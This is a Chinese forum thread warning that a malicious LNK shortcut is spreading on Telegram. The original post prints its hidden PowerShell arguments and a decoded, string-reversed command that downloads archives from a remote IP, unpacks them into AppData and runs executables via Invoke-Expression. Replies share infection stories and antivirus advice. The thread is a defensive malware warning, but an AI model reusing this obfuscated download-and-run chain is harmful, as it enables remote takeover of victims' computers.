近期telegram有人大肆传播lnk病毒

Author: zs448 - Posted:1个月前 - View:546

文件特征如下描述

一个zip压缩包,名字任意。但是压缩包非常小,小于10KB。

点开后里面是lnk文件,该文件为Windows平台专用,本质上是可执行任意指令的快捷方式。点击后你的电脑会变成肉鸡,入侵者可随意远程控制你的电脑。

所以遇到体积过小的压缩包,你又在使用Windows平台的话,请务必不要打开!推荐去把Windows的隐藏已知后缀取消,不要点击陌生lnk文件。

同时,推荐前往Windows telegram客户端关闭自动下载。

通过中标的人把lnk文件分享出来,写的啥?有懂的没?

1、目标执行程序

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2、原始参数(只截取前200字符,太多了)

-NoP -ep Bypass -w h -EncodedCommand  JAByAGUAdgAgAD0AIAAnADsAIgBlAHgAZQAuAGQAcwBsAG8AbwB0AG0AdgBcAFwAQwBNAE0AXABcAHQAZgBvAHMAbwByAGMAaQBNAFwAXABBAFQAQQBEAFAAUABBADoAdgBuAGUAJAAiACAAJgA7ACIAZQB…

3、以下是解码后的PowerShell命令

$rev = ';"exe.dslootmv\\CMM\\tfosorciM\\ATADPPA:vne$" &;"exe.tropghc\\CMM\\tfosorciM\\ATADPPA:vne$" &;ecroF- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" metI-evomeR ;ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" htaPnoitanitseD- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" htaP- evihcrA-dnapxE;gnisraPcisaBesU- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" o- "piz.1IJIZ/541.821.221.}BS{$}vv{$}ca{$" lruc;}lluN-tuO|ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" yrotceriD epyT- metI-weN  {))"CMM\\tfosorciM\\ATADPPA:vne$" htaP-tseT( ton-( fi ;gnisraPcisaBesU- "txt.明说\\htaPlacol$" o- "txt.明说/541.821.221.}BS{$}vv{$}ca{$" lruc;"431//:"=BS$;"gnisra"=ll$;"Pci"=kk$;"saB"=jj$;"esU-"=hh$;"p"=vv$;"tth"=ca$;"jdh"=jdh$;"juh"=juh$;"jDSh"=ERh$;"ertry"=dsef$;"eeewssy"=ssef$;"eesarreefdssy"=ssgfdf$;"eesacvd"=ssghild$;"teydhs"=DHSTRY$;"tolyghbs"=erfgy$;"dpolls"=fedsaa$;"dujtd"=ADSdRFD$;"sarfvc"=uuuhfb$;"sartrrtkj"=utvvyyyyhnd$;"sarKJHj"=utvvyyyHBnA$;"sarKFHj"=utADHBnA$;"sar"=utA$;"sarK"=utAd$;ecroF- "knl.txt.明说\\htaPlacol$" htaP- metI-evomeR ;htaP.)noitacoL-teG( = htaPlacol$'
$cmm = -join $rev[-1..-$rev.Length]
Invoke-Expression $cmm

4、图标伪装成下列形式

.\1.txt

5、文件描述(可能是垃圾数据)

JMjbdLxqqm1lDDqudandas

6、文件的一些时间信息

  • 创建时间 : 2023-06-26 10:13:29.233510+00:00
  • 修改时间 : 2023-06-26 10:13:29.233510+00:00
  • 访问时间 : 2023-06-26 10:13:29.233510+00:00

7、原始文件大小显示为323584字节

8、分布式链接追踪信息(机器标识等)

  • 机器标识符 : TESTMACHINE01234
  • Droid卷标识: 0C703587-9D5D-40F3-8021-0578FC96DDFD
  • Droid文件标识: D811239A-DCEC-4EF7-B3C9-55B9814E0699
0 人点赞  ∙  0 人收藏  
加入收藏 点赞 我要评论

目前共有 21 条回复

12
zhaowong
- zhaowong - 3天前

我最不喜欢听到有人电脑中毒了,因为我是干网管的,遇到情况,他们马上就CALL我去解决问题,而我只是业余的,不是啥都能解决啊,艹

heavil
- heavil - 3天前

只要会用电脑或手机,都要中一次毒,这样才会吸取教训,不至于脱离太多人的经历,

haibing
- haibing - 3天前

有些人搞这些病毒只是为了测试自己的技术,而有的是怀着深深的恶意,不过就算为了测试自己的技术也有点下作!

wb66f694a
- wb66f694a - 1个月前

用手机浏览器逛网站时,突然手机不受控制,自动打开摄像头直接对着我的脸,吓得我赶紧关机,第二天才敢开机,幸好那个手机只是备用机,我直接刷机了,如果是主力机,那我将损失惨重,至今我也不清楚到底是点了网站上什么地方导致出现这种情况的。

eai7u
- eai7u - 1个月前

我中标了,不过不是这款,而且网上下载站下载软件,用了高速下载功能,点exe软件后,给我电脑安装十几款软件,卸载这些破软件时,我电脑给搞蓝屏无法开机了,只得重装系统,去TMD的。

ericao
- ericao - 1个月前

看来各位道友喜欢折腾,难怪容易招针,我没事从不开电脑,想让我中针都难啊

aerph
- aerph - 1个月前

计算机里的病毒就跟现实病毒一样,有各种各样的变种,虽然修复了,要不了多久又有新的变种出来祸害了,只有修复不完的bug,如果都修复完了,软件或系统公司的人员都改裁掉了

weiboking
- weiboking - 1个月前

我没遇到过此病毒, 倒是U盘里的一直给你新建快捷方式的病毒中标过, 在网上有看到过讨论叫什么蠕虫,vbs病毒, 时间久了, 反正U盘格式化后就没了, 我那U盘就是装系统的, 没有其他文件, 要不然真是得不偿失啊

geekobo
- geekobo - 1个月前

@zls511234 不懂的话, 用元宝,deepseek,豆包等工具都可以得到你想要的答案, 一款聊天工具, 不过国内无法用

lydia
- lydia - 1个月前

看来各位消息闭塞了,,,,都已经2025年的事了, 现在还在被讨论, 应该是大家忙于工作, 只要更新系统最新系统就行了, 具体补丁都没有提供, 我还想着找到补丁分享来着

sange
- sange - 1个月前

"该漏洞最早于2025年3月被发现,8月被公开披露,微软最初拒绝承认其风险,后在第三方安全公司提供微补丁后进行了修复"-摘自百科.狗软还不承认, 承认了然后修复不就是好了, 西方就跟小日本一样没有羞耻心, 只是不被发现, 一切都跟没事一样...我CNM

zls511220
- zls511220 - 1个月前

反正我老电脑都没用了, 我愿意牺牲一下, 有人还有病毒文件吗???分享一下我试试, 看对方是不是要把我电脑弄炸掉

lessis
- lessis - 1个月前

好像很少听到linux或macx中招的新鲜事, 是高额价格和系统筛选人了, 我等这种穷B连被筛选的机会都没

sgkanz
- sgkanz - 1个月前

我记得不久前有种攻击方式是Powershell粘贴回车获取验证码, 反正win平台最好安装些杀软是必要的, 可以帮你解决生活中常见的麻烦事了, 至于更难解决的得靠人自己地

hbZKq
- hbZKq - 1个月前

我在想如果系统开了UAC的话, 估计攻击成功机会就要小很多了, 除非攻击代码里就有提权功能, 或者就是精通底层的奇才....

e05ee
- e05ee - 1个月前

这种病毒真是防不胜防, 毕竟lnk是Windows的快捷方式, 不小心双击打开肯定完蛋, 如果是快捷方式仿熟悉的图标, 那就更多人中标了, 如果不熟悉的图标还好点.

zls511255
- zls511255 - 1个月前

前不久我的tg帐号被盗了,虽然不是这种病毒,是那种以exe结尾的,我好像是要找啥需要的软件来着,然后就双击exe的应用程序,然后就没有然后了,对这些制造病毒的真是咬牙切齿的深恶痛觉

zls511238
- zls511238 - 1个月前

之前在群里有看过,有很长一段时间了吧,最近又开始传播了?,只有电脑上安装杀毒软件,会自动拦截的,个人不要太自信,必要时杀毒软件可以救救的

zls511234
- zls511234 - 1个月前

楼主大大,telegram是啥?可以传给我看看吗?

dosmoking
- dosmoking - 1个月前

看不懂,也不想看懂,单个词看都认识,堆在一起完全不知道,不用TG

12